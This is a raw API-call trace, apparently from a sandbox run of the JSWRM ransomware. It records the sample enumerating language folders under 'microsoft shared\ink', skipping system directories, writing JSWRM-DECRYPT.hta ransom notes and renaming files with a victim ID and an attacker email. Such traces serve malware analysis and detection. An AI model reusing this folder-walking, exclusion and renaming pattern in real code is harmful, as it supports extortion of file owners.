RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\jswrm-decrypt.hta")) returned 0xffffffff [0068.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.636] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.636] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.638] CloseHandle (hObject=0x454) returned 1 [0068.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.638] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\jswrm-decrypt.hta")) returned 0x20 [0068.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.638] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9223d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0068.638] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.638] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9223d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.638] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.638] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.638] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9223d3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f9223d3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f9223d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.638] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.639] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.639] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.639] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.640] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.640] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.640] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10078810777312192) returned 0 [0068.640] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.640] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.640] CloseHandle (hObject=0xffffffff) returned 1 [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0068.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0068.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.641] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.641] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.641] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.641] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2=".") returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="..") returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="...") returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="windows") returned -1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="recovery") returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="perflogs") returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="documents and settings") returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="$RECYCLE.BIN") returned 1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="system volume information") returned -1 [0068.641] lstrcmpiW (lpString1="ro-RO", lpString2="msocache") returned 1 [0068.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\jswrm-decrypt.hta")) returned 0xffffffff [0068.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.643] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.643] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.644] CloseHandle (hObject=0x454) returned 1 [0068.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.645] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\jswrm-decrypt.hta")) returned 0x20 [0068.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.645] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f948318, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0068.645] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.645] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f948318, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.645] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.645] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.645] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f948318, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f948318, ftLastAccessTime.dwHighDateTime=0x1d53d3c, 